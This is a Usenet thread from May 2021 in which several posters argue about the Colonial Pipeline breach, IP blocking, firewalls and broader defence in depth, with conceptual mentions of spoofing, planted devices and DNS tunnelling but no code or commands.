On 5/17/2021 2:12 PM, Ed Lee wrote:

> As long as proxies and/or original attack servers are in the US, they can
> send the FBI there. If they are from Russia, perhaps Putin would send the
> KGB there to help them.

The damage is still done. Are you going to arrest Mary Smith
because HER computer was used to shut down the centrifuges that
were processing the Uranium? You might hassle her and leave
her thinking that she should never open an email attachment
(or visit the "housewives for democracy" website). But,
you're still left with a crippled bit of infrastructure
and a "connection" that goes off to the next guy down the chain.

>> The silly part is guessing as to what was wrong and then speculating on
>> how to fix it.
>
> The wrong thing was having foreign access to mission critical computers.

The wrong thing was not having SECURE *remote* access (assuming remote
access was necessary).

You can spoof a MAC or IP address; it's not rocket science. You
can't KNOW where the connection is coming from.

You can limit maintenance activities to OUTBOUND connections
(i.e., have the kit contact a "known" computer). But, would
have to hardwire an IP address to avoid DNS cache poisoning
effects. And, a dedicated hacker could still locate a device
"somewhere" that convinces the routers involved that *it*
is the legitimate hardwired IP address.

(you *did* note the pwn plug reference I made, earlier?
Imagine *it* was sitting on John, Head of Pipeline Operations'
computer. *It* would appear to be the legitimate target of any
maintenance transactions if it filtered traffic to John's
*real* PC)

Security is hard. Just thinking you can slap some bandaid
or "guard" on a system is blissful ignorance.

On 5/17/2021 3:09 PM, Ralph Mowery wrote:
> In article <86e93215-4a42-459c-a1b0-a7efe7a216den@googlegroups.com>,
> edward.ming.lee@gmail.com says...
>>
>>> The silly part is guessing as to what was wrong and then speculating on how to fix it.
>>
>> The wrong thing was having foreign access to mission critical computers.
>
> The real wrong thing is to put anything on the internet where it can be
> accessed. While even a hard wired setup can be hacked, it would be much
> more difficult.

You can make things remotely accessible -- without having to give
away the keys to the castle!

If you want to *monitor*, then you don't need permission to CONTROL.
If you need to control, then there can be limits on the types of control
allowed as well as protocol steps that are required before they are
authorized/implemented.

Security is often just a "skin" -- a translucent one!

You don't need to know the names of the valid accounts/users on
a particular computer. All you need to know is YOUR account name
(and any appropriate credential). Being able to see other
account names leaks information that you don't NEED to see.

Being able to see the names of files -- even if you can't
access/modify their contents -- leaks information about what
they likely contain, when they were last accessed/modified,
etc.

They aren't YOUR files so you have no need to know ANYTHING
about them! Even whether or not they *exist*!

I'm always amazed at how often "personal data" is hacked/leaked.
I can understand needing on-line access to my account balances
to verify I can pay a particular bill. But, you don't need
access to my phone number, date of birth, residence, mothers
maiden name, etc. TO CHECK MY BALANCE.

And, you don't need to know EXACTLY what it is!

"Can he afford $239.45? -- yes or no!"

[If you then start asking about other amounts (in an attempt
to narrow down the actual amount by successive guessing),
then your connection could be flagged as 'suspicious']

On Monday, May 17, 2021 at 6:16:25 PM UTC-4, Don Y wrote:
> On 5/17/2021 2:12 PM, Ed Lee wrote:
>
> > As long as proxies and/or original attack servers are in the US, they can
> > send the FBI there. If they are from Russia, perhaps Putin would send the
> > KGB there to help them.
> The damage is still done. Are you going to arrest Mary Smith
> because HER computer was used to shut down the centrifuges that
> were processing the Uranium?

No, but you can hassle her because someone used here open wifi to download copyrighted materials.

I actually got booted from my ISP once because of a Xilinx app note I had in the wrong directory which made it accessible from file sharing software. Technically it is copyrighted and so I was out! I'm not sure I even read the thing. I saw it among the many files in random places in file sharing software and thought I should snag it rather than hunt for it on the Xilinx web site. I forgot to remove it from the file sharing software's view after I had it and that was the file they decided to nit pick over.

--

Rick C.

+-- Get 1,000 miles of free Supercharging
+-- Tesla referral code - https://ts.la/richard11209

On Monday, May 17, 2021 at 3:16:25 PM UTC-7, Don Y wrote:
> On 5/17/2021 2:12 PM, Ed Lee wrote:
>
> > As long as proxies and/or original attack servers are in the US, they can
> > send the FBI there. If they are from Russia, perhaps Putin would send the
> > KGB there to help them.
> The damage is still done. Are you going to arrest Mary Smith
> because HER computer was used to shut down the centrifuges that
> were processing the Uranium? You might hassle her and leave
> her thinking that she should never open an email attachment
> (or visit the "housewives for democracy" website). But,
> you're still left with a crippled bit of infrastructure
> and a "connection" that goes off to the next guy down the chain.

They can confiscate Mary's PC and start tracking down the next guy Tom.

> >> The silly part is guessing as to what was wrong and then speculating on
> >> how to fix it.
> >
> > The wrong thing was having foreign access to mission critical computers.
> The wrong thing was not having SECURE *remote* access (assuming remote
> access was necessary).
>
> You can spoof a MAC or IP address; it's not rocket science. You
> can't KNOW where the connection is coming from.

You have to spoof an IP address within range of your ISP. If it's an local ISP, it can be traced.

> You can limit maintenance activities to OUTBOUND connections
> (i.e., have the kit contact a "known" computer). But, would
> have to hardwire an IP address to avoid DNS cache poisoning
> effects. And, a dedicated hacker could still locate a device
> "somewhere" that convinces the routers involved that *it*
> is the legitimate hardwired IP address.
>
> (you *did* note the pwn plug reference I made, earlier?
> Imagine *it* was sitting on John, Head of Pipeline Operations'
> computer. *It* would appear to be the legitimate target of any
> maintenance transactions if it filtered traffic to John's
> *real* PC)

Port scanning, intrusion and proxy take days. The authority would have time to shutdown John's PC, if it's in the US.
> Security is hard. Just thinking you can slap some bandaid
> or "guard" on a system is blissful ignorance.

That doesn't mean we just let it wide open, without blocking anything.

On 5/17/2021 4:15 PM, Ed Lee wrote:
> On Monday, May 17, 2021 at 3:16:25 PM UTC-7, Don Y wrote:
>> On 5/17/2021 2:12 PM, Ed Lee wrote:
>>
>>> As long as proxies and/or original attack servers are in the US, they can
>>> send the FBI there. If they are from Russia, perhaps Putin would send the
>>> KGB there to help them.
>> The damage is still done. Are you going to arrest Mary Smith
>> because HER computer was used to shut down the centrifuges that
>> were processing the Uranium? You might hassle her and leave
>> her thinking that she should never open an email attachment
>> (or visit the "housewives for democracy" website). But,
>> you're still left with a crippled bit of infrastructure
>> and a "connection" that goes off to the next guy down the chain.
>
> They can confiscate Mary's PC and start tracking down the next guy Tom.

And the guy after that.... until they find themselves in a jurisdiction
where they have no leverage.

Meanwhile, the pipeline is still down!

>>>> The silly part is guessing as to what was wrong and then speculating on
>>>> how to fix it.
>>>
>>> The wrong thing was having foreign access to mission critical computers.
>> The wrong thing was not having SECURE *remote* access (assuming remote
>> access was necessary).
>>
>> You can spoof a MAC or IP address; it's not rocket science. You
>> can't KNOW where the connection is coming from.
>
> You have to spoof an IP address within range of your ISP. If it's an local ISP, it can be traced.

You're obsessed with being able to catch the perp.
How many crimes do you think go "unpunished"? Do you
think you'll have a better batting average with these?

Ask yourslef how many happen every day that go unreported
(to the authorities OR the public). Lots of perps running
around, free to ply their wares on the next mark!

>> You can limit maintenance activities to OUTBOUND connections
>> (i.e., have the kit contact a "known" computer). But, would
>> have to hardwire an IP address to avoid DNS cache poisoning
>> effects. And, a dedicated hacker could still locate a device
>> "somewhere" that convinces the routers involved that *it*
>> is the legitimate hardwired IP address.
>>
>> (you *did* note the pwn plug reference I made, earlier?
>> Imagine *it* was sitting on John, Head of Pipeline Operations'
>> computer. *It* would appear to be the legitimate target of any
>> maintenance transactions if it filtered traffic to John's
>> *real* PC)
>
> Port scanning, intrusion and proxy take days. The authority would have
> time to shutdown John's PC, if it's in the US.

You're assuming they KNOW it's John's PC -- in short order.

And, you're assuming that there is only one attack vector.

You just keep painting yourself into a smaller corner
each time you HOPE some of these tactics yields results.

I guess the FBI and NSA should be hiring YOU -- as you seem
to have all the answers! (they must just be a bunch of
stupid bureaucrats, eh?)

You consistently seem to downplay risk -- in your code, in your
analysis of security issues, etc. That's a bad attitude for
any developer!

"Don't worry, the condom won't break..."

>> Security is hard. Just thinking you can slap some bandaid
>> or "guard" on a system is blissful ignorance.
>
> That doesn't mean we just let it wide open, without blocking anything.

Blocking is only effective if it *is* effective.
If someone can subvert ANY protection mechanism,
then the protection mechanism represents an expenditure
of YOUR effort -- but with no *actual* results!

On Monday, May 17, 2021 at 4:29:00 PM UTC-7, Don Y wrote:
> On 5/17/2021 4:15 PM, Ed Lee wrote:
> > On Monday, May 17, 2021 at 3:16:25 PM UTC-7, Don Y wrote:
> >> On 5/17/2021 2:12 PM, Ed Lee wrote:
> >>
> >>> As long as proxies and/or original attack servers are in the US, they can
> >>> send the FBI there. If they are from Russia, perhaps Putin would send the
> >>> KGB there to help them.
> >> The damage is still done. Are you going to arrest Mary Smith
> >> because HER computer was used to shut down the centrifuges that
> >> were processing the Uranium? You might hassle her and leave
> >> her thinking that she should never open an email attachment
> >> (or visit the "housewives for democracy" website). But,
> >> you're still left with a crippled bit of infrastructure
> >> and a "connection" that goes off to the next guy down the chain.
> >
> > They can confiscate Mary's PC and start tracking down the next guy Tom.
> And the guy after that.... until they find themselves in a jurisdiction
> where they have no leverage.

Confiscating Mary's PC broke the chain. Whether they catch Tom or not, there is no more damage.

> Meanwhile, the pipeline is still down!
> >>>> The silly part is guessing as to what was wrong and then speculating on
> >>>> how to fix it.
> >>>
> >>> The wrong thing was having foreign access to mission critical computers.
> >> The wrong thing was not having SECURE *remote* access (assuming remote
> >> access was necessary).
> >>
> >> You can spoof a MAC or IP address; it's not rocket science. You
> >> can't KNOW where the connection is coming from.
> >
> > You have to spoof an IP address within range of your ISP. If it's an local ISP, it can be traced.
> You're obsessed with being able to catch the perp.
> How many crimes do you think go "unpunished"? Do you
> think you'll have a better batting average with these?

Only the serious crime. Hacking the pipeline qualified as such.

> Ask yourslef how many happen every day that go unreported
> (to the authorities OR the public). Lots of perps running
> around, free to ply their wares on the next mark!
> >> You can limit maintenance activities to OUTBOUND connections
> >> (i.e., have the kit contact a "known" computer). But, would
> >> have to hardwire an IP address to avoid DNS cache poisoning
> >> effects. And, a dedicated hacker could still locate a device
> >> "somewhere" that convinces the routers involved that *it*
> >> is the legitimate hardwired IP address.
> >>
> >> (you *did* note the pwn plug reference I made, earlier?
> >> Imagine *it* was sitting on John, Head of Pipeline Operations'
> >> computer. *It* would appear to be the legitimate target of any
> >> maintenance transactions if it filtered traffic to John's
> >> *real* PC)
> >
> > Port scanning, intrusion and proxy take days. The authority would have
> > time to shutdown John's PC, if it's in the US.
> You're assuming they KNOW it's John's PC -- in short order.
>
> And, you're assuming that there is only one attack vector.
>
> You just keep painting yourself into a smaller corner
> each time you HOPE some of these tactics yields results.
>
> I guess the FBI and NSA should be hiring YOU -- as you seem
> to have all the answers! (they must just be a bunch of
> stupid bureaucrats, eh?)

No, but i did work for another agency on this.

> You consistently seem to downplay risk -- in your code, in your
> analysis of security issues, etc. That's a bad attitude for
> any developer!
>
> "Don't worry, the condom won't break..."
> >> Security is hard. Just thinking you can slap some bandaid
> >> or "guard" on a system is blissful ignorance.
> >
> > That doesn't mean we just let it wide open, without blocking anything.
> Blocking is only effective if it *is* effective.
> If someone can subvert ANY protection mechanism,
> then the protection mechanism represents an expenditure
> of YOUR effort -- but with no *actual* results!

It is effective. Most entities are just not putting enough effort in firewalling, until it's too late.

DecadentLinuxUserNumeroUno@decadence.org wrote:
> Cydrome Leader <presence@MUNGEpanix.com> wrote in
> news:s7s6r2$9qe$1@reader1.panix.com:
>
>> We had a problem at work where an alarm system was dialing people
>> with vague pre-recorded messages about temperature or pressure
>> alarms on HVAC equipment. Nobody could figure out where the device
>> was or how to stop it. The messages and phone numbers were entered
>> by a long gone employee.
>
> Old temperature controlled computer rooms used to dial out if certain
> thresholds were breeched. Usually requiring that a tech wake up and
> get out there to assess the situation.

There was other nonsense like too many AC units, so they'd fight over
temperatures and short cycle then shut down. There was some mysterious art
to setting the thermostats. Air handler belts would sometimes slip and
blow black dust all over the place. A gross layer of soot would cover all
equipment. It was a mess.

On 5/17/2021 4:39 PM, Ed Lee wrote:
> On Monday, May 17, 2021 at 4:29:00 PM UTC-7, Don Y wrote:
>> On 5/17/2021 4:15 PM, Ed Lee wrote:
>>> On Monday, May 17, 2021 at 3:16:25 PM UTC-7, Don Y wrote:
>>>> On 5/17/2021 2:12 PM, Ed Lee wrote:
>>>>
>>>>> As long as proxies and/or original attack servers are in the US, they can
>>>>> send the FBI there. If they are from Russia, perhaps Putin would send the
>>>>> KGB there to help them.
>>>> The damage is still done. Are you going to arrest Mary Smith
>>>> because HER computer was used to shut down the centrifuges that
>>>> were processing the Uranium? You might hassle her and leave
>>>> her thinking that she should never open an email attachment
>>>> (or visit the "housewives for democracy" website). But,
>>>> you're still left with a crippled bit of infrastructure
>>>> and a "connection" that goes off to the next guy down the chain.
>>>
>>> They can confiscate Mary's PC and start tracking down the next guy Tom.
>> And the guy after that.... until they find themselves in a jurisdiction
>> where they have no leverage.
>
> Confiscating Mary's PC broke the chain. Whether they catch Tom or not, there is no more damage.

No, it didn't. Betty's computer is ready to step in and assume
the role -- the pipeline is under the hacker's control so THEY
decide how that control is implemented. All you can do is
cut your connection to the outside world. In which case,
the hackers have achieved their goal and can wait for you
to try to bring things back on-line.

You keep assuming that there are "rules" that are followed.
There aren't. That's why the breach is possible (had the
attacker followed the rules, they wouldn't have gained access!)

>> Meanwhile, the pipeline is still down!
>>>>>> The silly part is guessing as to what was wrong and then speculating on
>>>>>> how to fix it.
>>>>>
>>>>> The wrong thing was having foreign access to mission critical computers.
>>>> The wrong thing was not having SECURE *remote* access (assuming remote
>>>> access was necessary).
>>>>
>>>> You can spoof a MAC or IP address; it's not rocket science. You
>>>> can't KNOW where the connection is coming from.
>>>
>>> You have to spoof an IP address within range of your ISP. If it's an local ISP, it can be traced.
>> You're obsessed with being able to catch the perp.
>> How many crimes do you think go "unpunished"? Do you
>> think you'll have a better batting average with these?
>
> Only the serious crime. Hacking the pipeline qualified as such.

So, hacking the government's personnel files isn't?
Hacking banks? Major corporations? Where do you draw
the line? Is it based on number of persons affected?
Dollars at stake? "Pride" issues?

And, once you set a threshold, you effectively tell the hackers:
"You are free to go after anything below this level with impunity;
we don't have the resources nor desire to track you down."

I'm sure THAT sort of policy will be a big hit with the folks
who fail to rise above that threshold!

>> Ask yourslef how many happen every day that go unreported
>> (to the authorities OR the public). Lots of perps running
>> around, free to ply their wares on the next mark!
>>>> You can limit maintenance activities to OUTBOUND connections
>>>> (i.e., have the kit contact a "known" computer). But, would
>>>> have to hardwire an IP address to avoid DNS cache poisoning
>>>> effects. And, a dedicated hacker could still locate a device
>>>> "somewhere" that convinces the routers involved that *it*
>>>> is the legitimate hardwired IP address.
>>>>
>>>> (you *did* note the pwn plug reference I made, earlier?
>>>> Imagine *it* was sitting on John, Head of Pipeline Operations'
>>>> computer. *It* would appear to be the legitimate target of any
>>>> maintenance transactions if it filtered traffic to John's
>>>> *real* PC)
>>>
>>> Port scanning, intrusion and proxy take days. The authority would have
>>> time to shutdown John's PC, if it's in the US.
>> You're assuming they KNOW it's John's PC -- in short order.
>>
>> And, you're assuming that there is only one attack vector.
>>
>> You just keep painting yourself into a smaller corner
>> each time you HOPE some of these tactics yields results.
>>
>> I guess the FBI and NSA should be hiring YOU -- as you seem
>> to have all the answers! (they must just be a bunch of
>> stupid bureaucrats, eh?)
>
> No, but i did work for another agency on this.

And they've had no successful penetrations? Are they using
YOUR naive recommendations? Have their adversaries failed
to learn and adapt their processes after you left?

[You should recommend them to the FBI and NSA to take on
*their* responsibilities!]

Imagine how many breaches happen every day that are hushed up
(because the parties don't want the public to lose faith in them)
and unreported. Wanna bet your local hospital has been victimized?
Do you recall hearing about it on the local news??

A friend was the safety officer at one of the local hospitals.
I got a panicked call, one night, because someone had used
his laptop and it was now locked-pending-ransomware. He
had nothing of value on the laptop -- but, his reputation (job!)
at stake (despite the fact that HE wasn't the one who
had caused the infection) in that he'd allowed the laptop to
leave his *personal* control. My job, clean off the laptop
and make it look like the infection had never occurred.

(which meant also scanning other media he had in his possession)

>> You consistently seem to downplay risk -- in your code, in your
>> analysis of security issues, etc. That's a bad attitude for
>> any developer!
>>
>> "Don't worry, the condom won't break..."
>>>> Security is hard. Just thinking you can slap some bandaid
>>>> or "guard" on a system is blissful ignorance.
>>>
>>> That doesn't mean we just let it wide open, without blocking anything.
>> Blocking is only effective if it *is* effective.
>> If someone can subvert ANY protection mechanism,
>> then the protection mechanism represents an expenditure
>> of YOUR effort -- but with no *actual* results!
>
> It is effective. Most entities are just not putting enough effort in firewalling, until it's too late.

Firewalls, by themselves, are largely useless. It's like putting
two locks on your front door -- and forgetting that you also
have windows and skylights, invite workmen into your home, etc.

Did you remove all of the floppy disks, USB ports, CD/DVD drives
and other mechanisms that can be used to *locally* inject software
into a machine INSIDE the firewalled domain?

Have you put filters on all of your incoming mail traffic and WWW responses?

Are you sure nothing is tunneling through your firewall on some
benign but ubiquitous protocol (like DNS)?

Do you have a penetration testing system in place and on-line?

Do you have staff who can think of how zero-day exploits can subvert
their best practices (or, are they just trained monkeys imlementing
policy decided elsewhere)?

I had an "aunt" (more likely a third cousin) who was very proud
of her furs and jewelry. One day, she came home to find the
side door of her house completely torn from its frame -- and
the "goodies" missing. No need to bother with breaking a window,
just pull the truck up to the door and remove it from the frame!

I worked on the design of "island terminals" -- essentially
self-serve payment centers. These intended to be left,
unattended, in places like gas stations. The electronics
were small -- about the size of a notebook. The *case*
into which it was installed was bigger than a phone booth
(broad base to anchor to the concrete beneath) and made
of 1/4 thick steel. Definitely not necessary for a little
bit of electronics -- but, essential if you want to thwart someone
smashing into it with a vehicle in an attempt to access its
contents!

If you've ever tried to hack one of AT&T's "fortress" phones,
you'll discover that the only effective hack is to physically
remove it from the booth and cart it off to another location;
you won't be able to get access to it's coinbox in the time
it will take for them to notice the attempt!

Spend some time on a red team to realize how foolish the protections
actually are!

On Monday, May 17, 2021 at 5:02:00 PM UTC-7, Don Y wrote:
> On 5/17/2021 4:39 PM, Ed Lee wrote:
> > On Monday, May 17, 2021 at 4:29:00 PM UTC-7, Don Y wrote:
> >> On 5/17/2021 4:15 PM, Ed Lee wrote:
> >>> On Monday, May 17, 2021 at 3:16:25 PM UTC-7, Don Y wrote:
> >>>> On 5/17/2021 2:12 PM, Ed Lee wrote:
> >>>>
> >>>>> As long as proxies and/or original attack servers are in the US, they can
> >>>>> send the FBI there. If they are from Russia, perhaps Putin would send the
> >>>>> KGB there to help them.
> >>>> The damage is still done. Are you going to arrest Mary Smith
> >>>> because HER computer was used to shut down the centrifuges that
> >>>> were processing the Uranium? You might hassle her and leave
> >>>> her thinking that she should never open an email attachment
> >>>> (or visit the "housewives for democracy" website). But,
> >>>> you're still left with a crippled bit of infrastructure
> >>>> and a "connection" that goes off to the next guy down the chain.
> >>>
> >>> They can confiscate Mary's PC and start tracking down the next guy Tom.
> >> And the guy after that.... until they find themselves in a jurisdiction
> >> where they have no leverage.
> >
> > Confiscating Mary's PC broke the chain. Whether they catch Tom or not, there is no more damage.
> No, it didn't. Betty's computer is ready to step in and assume
> the role -- the pipeline is under the hacker's control so THEY
> decide how that control is implemented. All you can do is
> cut your connection to the outside world. In which case,
> the hackers have achieved their goal and can wait for you
> to try to bring things back on-line.

The important point is blocking access with firewall before they get access through Mary, Betty and Tom.

> You keep assuming that there are "rules" that are followed.
> There aren't. That's why the breach is possible (had the
> attacker followed the rules, they wouldn't have gained access!)
> >> Meanwhile, the pipeline is still down!
> >>>>>> The silly part is guessing as to what was wrong and then speculating on
> >>>>>> how to fix it.
> >>>>>
> >>>>> The wrong thing was having foreign access to mission critical computers.
> >>>> The wrong thing was not having SECURE *remote* access (assuming remote
> >>>> access was necessary).
> >>>>
> >>>> You can spoof a MAC or IP address; it's not rocket science. You
> >>>> can't KNOW where the connection is coming from.
> >>>
> >>> You have to spoof an IP address within range of your ISP. If it's an local ISP, it can be traced.
> >> You're obsessed with being able to catch the perp.
> >> How many crimes do you think go "unpunished"? Do you
> >> think you'll have a better batting average with these?
> >
> > Only the serious crime. Hacking the pipeline qualified as such.
> So, hacking the government's personnel files isn't?
> Hacking banks? Major corporations? Where do you draw
> the line? Is it based on number of persons affected?
> Dollars at stake? "Pride" issues?
>
> And, once you set a threshold, you effectively tell the hackers:
> "You are free to go after anything below this level with impunity;
> we don't have the resources nor desire to track you down."
>
> I'm sure THAT sort of policy will be a big hit with the folks
> who fail to rise above that threshold!
> >> Ask yourslef how many happen every day that go unreported
> >> (to the authorities OR the public). Lots of perps running
> >> around, free to ply their wares on the next mark!
> >>>> You can limit maintenance activities to OUTBOUND connections
> >>>> (i.e., have the kit contact a "known" computer). But, would
> >>>> have to hardwire an IP address to avoid DNS cache poisoning
> >>>> effects. And, a dedicated hacker could still locate a device
> >>>> "somewhere" that convinces the routers involved that *it*
> >>>> is the legitimate hardwired IP address.
> >>>>
> >>>> (you *did* note the pwn plug reference I made, earlier?
> >>>> Imagine *it* was sitting on John, Head of Pipeline Operations'
> >>>> computer. *It* would appear to be the legitimate target of any
> >>>> maintenance transactions if it filtered traffic to John's
> >>>> *real* PC)
> >>>
> >>> Port scanning, intrusion and proxy take days. The authority would have
> >>> time to shutdown John's PC, if it's in the US.
> >> You're assuming they KNOW it's John's PC -- in short order.
> >>
> >> And, you're assuming that there is only one attack vector.
> >>
> >> You just keep painting yourself into a smaller corner
> >> each time you HOPE some of these tactics yields results.
> >>
> >> I guess the FBI and NSA should be hiring YOU -- as you seem
> >> to have all the answers! (they must just be a bunch of
> >> stupid bureaucrats, eh?)
> >
> > No, but i did work for another agency on this.
> And they've had no successful penetrations? Are they using
> YOUR naive recommendations? Have their adversaries failed
> to learn and adapt their processes after you left?

It was not my recommendations. It was group work in intrusion detection. I was just part of a team.

> [You should recommend them to the FBI and NSA to take on
> *their* responsibilities!]
>
> Imagine how many breaches happen every day that are hushed up
> (because the parties don't want the public to lose faith in them)
> and unreported. Wanna bet your local hospital has been victimized?
> Do you recall hearing about it on the local news??
>
> A friend was the safety officer at one of the local hospitals.
> I got a panicked call, one night, because someone had used
> his laptop and it was now locked-pending-ransomware. He
> had nothing of value on the laptop -- but, his reputation (job!)
> at stake (despite the fact that HE wasn't the one who
> had caused the infection) in that he'd allowed the laptop to
> leave his *personal* control. My job, clean off the laptop
> and make it look like the infection had never occurred.
>
> (which meant also scanning other media he had in his possession)
> >> You consistently seem to downplay risk -- in your code, in your
> >> analysis of security issues, etc. That's a bad attitude for
> >> any developer!
> >>
> >> "Don't worry, the condom won't break..."
> >>>> Security is hard. Just thinking you can slap some bandaid
> >>>> or "guard" on a system is blissful ignorance.
> >>>
> >>> That doesn't mean we just let it wide open, without blocking anything.
> >> Blocking is only effective if it *is* effective.
> >> If someone can subvert ANY protection mechanism,
> >> then the protection mechanism represents an expenditure
> >> of YOUR effort -- but with no *actual* results!
> >
> > It is effective. Most entities are just not putting enough effort in firewalling, until it's too late.
> Firewalls, by themselves, are largely useless. It's like putting
> two locks on your front door -- and forgetting that you also
> have windows and skylights, invite workmen into your home, etc.
>
> Did you remove all of the floppy disks, USB ports, CD/DVD drives
> and other mechanisms that can be used to *locally* inject software
> into a machine INSIDE the firewalled domain?

These would require local accesses to machines, which are easier to guard against.
> Have you put filters on all of your incoming mail traffic and WWW responses?
>
> Are you sure nothing is tunneling through your firewall on some
> benign but ubiquitous protocol (like DNS)?

Can you explain how this Domain Name Service (DNS) can hid the real IP?

On 5/17/2021 5:22 PM, Ed Lee wrote:
> On Monday, May 17, 2021 at 5:02:00 PM UTC-7, Don Y wrote:
>> On 5/17/2021 4:39 PM, Ed Lee wrote:
>>> On Monday, May 17, 2021 at 4:29:00 PM UTC-7, Don Y wrote:

>>> Confiscating Mary's PC broke the chain. Whether they catch Tom or not, there is no more damage.
>> No, it didn't. Betty's computer is ready to step in and assume
>> the role -- the pipeline is under the hacker's control so THEY
>> decide how that control is implemented. All you can do is
>> cut your connection to the outside world. In which case,
>> the hackers have achieved their goal and can wait for you
>> to try to bring things back on-line.
>
> The important point is blocking access with firewall before they get access through Mary, Betty and Tom.

Your initial claim was to block russian and chinese IPs. I
proposed a method by which russian/chinese-based hackers could
compromise a computer located WITHIN *your* claimed protection
domain ("The US").

Make that as small as you want and the attack still succeeds;
it just means the attacker has to target a smaller set of "allowed
hosts" (like John, Head of Pipeline Operations)

Hey, maybe you can block John, too! (then what value to remote access?)

>>>> Ask yourslef how many happen every day that go unreported
>>>> (to the authorities OR the public). Lots of perps running
>>>> around, free to ply their wares on the next mark!
>>>>>> You can limit maintenance activities to OUTBOUND connections
>>>>>> (i.e., have the kit contact a "known" computer). But, would
>>>>>> have to hardwire an IP address to avoid DNS cache poisoning
>>>>>> effects. And, a dedicated hacker could still locate a device
>>>>>> "somewhere" that convinces the routers involved that *it*
>>>>>> is the legitimate hardwired IP address.
>>>>>>
>>>>>> (you *did* note the pwn plug reference I made, earlier?
>>>>>> Imagine *it* was sitting on John, Head of Pipeline Operations'
>>>>>> computer. *It* would appear to be the legitimate target of any
>>>>>> maintenance transactions if it filtered traffic to John's
>>>>>> *real* PC)
>>>>>
>>>>> Port scanning, intrusion and proxy take days. The authority would have
>>>>> time to shutdown John's PC, if it's in the US.
>>>> You're assuming they KNOW it's John's PC -- in short order.
>>>>
>>>> And, you're assuming that there is only one attack vector.
>>>>
>>>> You just keep painting yourself into a smaller corner
>>>> each time you HOPE some of these tactics yields results.
>>>>
>>>> I guess the FBI and NSA should be hiring YOU -- as you seem
>>>> to have all the answers! (they must just be a bunch of
>>>> stupid bureaucrats, eh?)
>>>
>>> No, but i did work for another agency on this.
>> And they've had no successful penetrations? Are they using
>> YOUR naive recommendations? Have their adversaries failed
>> to learn and adapt their processes after you left?
>
> It was not my recommendations. It was group work in intrusion detection. I was just part of a team.

And how successful are those techniques, *today*?

>> [You should recommend them to the FBI and NSA to take on
>> *their* responsibilities!]
>> Did you remove all of the floppy disks, USB ports, CD/DVD drives
>> and other mechanisms that can be used to *locally* inject software
>> into a machine INSIDE the firewalled domain?
>
> These would require local accesses to machines, which are easier to guard against.

Did you read the PwnPlug article? Did you note how the Bank Officials
WELCOMED the guy onto their premises who placed the device?

How many people wander around your average business in the course
of performing their normal duties? Plumbers, carpenters, electricians,
etc. They don't have to KNOW how to use a device to be exploited in
*placing* the device: "Here's $500 if you will put this device
in an out of the way location at company X"

Did you recall hearing accounts of US citizens who'd been paid to
set up domestic accounts that were actually foreign controlled?
Do you think they understood the consequences of their actions?
Do you think they would have refused the monies offered had they
understood (or, would they just have insisted on MORE)?

>> Have you put filters on all of your incoming mail traffic and WWW responses?
>>
>> Are you sure nothing is tunneling through your firewall on some
>> benign but ubiquitous protocol (like DNS)?
>
> Can you explain how this Domain Name Service (DNS) can hid the real IP?

You use a tunneling protocol to pass *information* out of (and into)
a firewalled domain. You're still looking for the perp instead
of focusing on the damage he's doing!

I can put a device inside a protection domain and have it communicate
with an outside agent without drawing attention to the fact that it
is doing so. The outside agency can similarly return command and
control information to that device using that -- or other -- protocols.

Lock down DNS and I'll piggyback under HTTP. Or SMTP/POPD. Or
I'll post coded instructions on a bogus facebook page (that your
IT department will allow to be viewed simply because your
employees visit other facebook pages as part of their "internet
access perk")

Your firewall has to be porous for you to conduct your business.
Because of that, there are always ways to sneak information
through it.

On Monday, May 17, 2021 at 5:36:47 PM UTC-7, Don Y wrote:
> On 5/17/2021 5:22 PM, Ed Lee wrote:
> > On Monday, May 17, 2021 at 5:02:00 PM UTC-7, Don Y wrote:
> >> On 5/17/2021 4:39 PM, Ed Lee wrote:
> >>> On Monday, May 17, 2021 at 4:29:00 PM UTC-7, Don Y wrote:
>
> >>> Confiscating Mary's PC broke the chain. Whether they catch Tom or not, there is no more damage.
> >> No, it didn't. Betty's computer is ready to step in and assume
> >> the role -- the pipeline is under the hacker's control so THEY
> >> decide how that control is implemented. All you can do is
> >> cut your connection to the outside world. In which case,
> >> the hackers have achieved their goal and can wait for you
> >> to try to bring things back on-line.
> >
> > The important point is blocking access with firewall before they get access through Mary, Betty and Tom.
> Your initial claim was to block russian and chinese IPs. I
> proposed a method by which russian/chinese-based hackers could
> compromise a computer located WITHIN *your* claimed protection
> domain ("The US").
>
> Make that as small as you want and the attack still succeeds;
> it just means the attacker has to target a smaller set of "allowed
> hosts" (like John, Head of Pipeline Operations)
>
> Hey, maybe you can block John, too! (then what value to remote access?)

They don't have to block John, but he will be the first to be visited by authority.

> >>>> Ask yourslef how many happen every day that go unreported
> >>>> (to the authorities OR the public). Lots of perps running
> >>>> around, free to ply their wares on the next mark!
> >>>>>> You can limit maintenance activities to OUTBOUND connections
> >>>>>> (i.e., have the kit contact a "known" computer). But, would
> >>>>>> have to hardwire an IP address to avoid DNS cache poisoning
> >>>>>> effects. And, a dedicated hacker could still locate a device
> >>>>>> "somewhere" that convinces the routers involved that *it*
> >>>>>> is the legitimate hardwired IP address.
> >>>>>>
> >>>>>> (you *did* note the pwn plug reference I made, earlier?
> >>>>>> Imagine *it* was sitting on John, Head of Pipeline Operations'
> >>>>>> computer. *It* would appear to be the legitimate target of any
> >>>>>> maintenance transactions if it filtered traffic to John's
> >>>>>> *real* PC)
> >>>>>
> >>>>> Port scanning, intrusion and proxy take days. The authority would have
> >>>>> time to shutdown John's PC, if it's in the US.
> >>>> You're assuming they KNOW it's John's PC -- in short order.
> >>>>
> >>>> And, you're assuming that there is only one attack vector.
> >>>>
> >>>> You just keep painting yourself into a smaller corner
> >>>> each time you HOPE some of these tactics yields results.
> >>>>
> >>>> I guess the FBI and NSA should be hiring YOU -- as you seem
> >>>> to have all the answers! (they must just be a bunch of
> >>>> stupid bureaucrats, eh?)
> >>>
> >>> No, but i did work for another agency on this.
> >> And they've had no successful penetrations? Are they using
> >> YOUR naive recommendations? Have their adversaries failed
> >> to learn and adapt their processes after you left?
> >
> > It was not my recommendations. It was group work in intrusion detection. I was just part of a team.
> And how successful are those techniques, *today*?
> >> [You should recommend them to the FBI and NSA to take on
> >> *their* responsibilities!]
> >> Did you remove all of the floppy disks, USB ports, CD/DVD drives
> >> and other mechanisms that can be used to *locally* inject software
> >> into a machine INSIDE the firewalled domain?
> >
> > These would require local accesses to machines, which are easier to guard against.
> Did you read the PwnPlug article? Did you note how the Bank Officials
> WELCOMED the guy onto their premises who placed the device?
>
> How many people wander around your average business in the course
> of performing their normal duties? Plumbers, carpenters, electricians,
> etc. They don't have to KNOW how to use a device to be exploited in
